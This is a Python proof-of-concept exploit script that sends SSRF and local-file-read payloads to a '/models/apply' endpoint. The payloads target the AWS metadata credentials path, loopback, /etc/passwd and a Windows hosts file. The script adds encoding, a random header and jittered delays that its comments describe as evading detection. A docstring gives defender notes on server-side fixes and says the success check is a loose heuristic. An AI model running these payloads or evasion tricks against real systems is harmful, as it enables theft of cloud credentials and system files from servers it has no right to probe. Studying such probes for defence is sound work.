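"""Proof-of-concept probe for SSRF / local file read via a ``/models/apply`` endpoint.

Each payload places a URI in the JSON ``model`` field and POSTs it to
``target_url``. The probe is only meaningful if the server dereferences that
field without restricting scheme or destination. That server-side behaviour is
not shown in this file, so treat it as the assumption under test.

Defender notes:
  * The fix belongs on the server: accept only an allowlist of schemes and
    hosts for ``model``, reject ``file://``, and check the resolved address so
    loopback and link-local (169.254.0.0/16) destinations are refused.
  * On AWS, enforcing IMDSv2 and blocking egress to the metadata address
    limits what a plain server-side GET can reach.
  * Detection should key on the request path and on the ``model`` value in the
    body. The randomised header and jittered delay below change neither.
  * The success check is a loose heuristic (HTTP 200 and no "error"
    substring). A "failed" line is not evidence that an instance is patched.
"""

import random
import string
import time  # used by the pacing loop in the entry point; missing from the original imports
import urllib.parse

import requests

# Target URL (placeholder host; the path is the endpoint under test)
target_url = "http://target.localai.instance/models/apply"


def generate_random_string(length=6):
    """Return ``length`` random ASCII letters and digits.

    ``random`` is used rather than ``secrets``; the value is filler text,
    not a credential or token.
    """
    return ''.join(random.choices(string.ascii_letters + string.digits, k=length))


# Advanced list of payloads for SSRF and LFI, including obfuscation and bypass techniques.
# NOTE: the list is built at import time, so the random path segments are
# generated once per run rather than once per request.
payloads = [
    {"model": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"},
    {"model": "http://127.0.0.1:80/"},
    {"model": "file:///etc/passwd"},
    {"model": "file:///C:/Windows/System32/drivers/etc/hosts"},
    # Obfuscated and encoded variations
    {"model": "file://" + generate_random_string() + "/../etc/passwd"},
    {"model": "file://" + generate_random_string() + "/../Windows/System32/drivers/etc/hosts"},
]


def send_payload(payload):
    """POST one payload as JSON to ``target_url`` and print a verdict.

    Args:
        payload: dict sent as the JSON request body.

    Returns:
        None. Any ``requests`` exception (timeout, connection error, ...) is
        caught and printed instead of propagating.
    """
    try:
        # Set headers to mimic different browsers or clients
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0",
            "Content-Type": "application/json",
            "Referer": "http://example.com",
            "X-Custom-Header": generate_random_string(8)  # Custom header to evade detection
        }

        # Send POST request; the 7 s timeout keeps a non-responding target
        # from stalling the whole run.
        response = requests.post(target_url, json=payload, headers=headers, timeout=7)

        # Analyze the response. This is a heuristic only: any 200 body that
        # lacks the substring "error" is reported as success, so both
        # verdicts need manual confirmation.
        if response.status_code == 200 and "error" not in response.text.lower():
            print(f"[+] Exploit Successful! Payload: {payload}")
            # Only the first 500 characters of the body are echoed.
            print(f"[+] Response (Trimmed):\n{response.text[:500]}")
        else:
            print(f"[-] Exploit Failed or No Significant Response. Payload: {payload}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request Failed: {e}")


def obfuscate_payload(payload):
    """Return a copy of ``payload`` with every value percent-encoded.

    Each value is passed through ``urllib.parse.quote_plus``, so all values
    must be ``str``. No delay is introduced here; request pacing is handled
    by the loop in the entry point.
    """
    obfuscated_payload = {key: urllib.parse.quote_plus(value) for key, value in payload.items()}
    return obfuscated_payload


if __name__ == "__main__":
    print("[*] Starting Advanced Exploitation...")

    for payload in payloads:
        # Random delay to avoid detection by IDS/IPS systems
        delay = random.uniform(1, 3)
        print(f"[*] Delaying for {delay:.2f} seconds to avoid detection...")
        time.sleep(delay)

        # Obfuscate and send the payload
        obfuscated_payload = obfuscate_payload(payload)
        print(f"[*] Sending Obfuscated Payload: {obfuscated_payload}")
        send_payload(obfuscated_payload)

    print("[*] Advanced Exploitation Complete.")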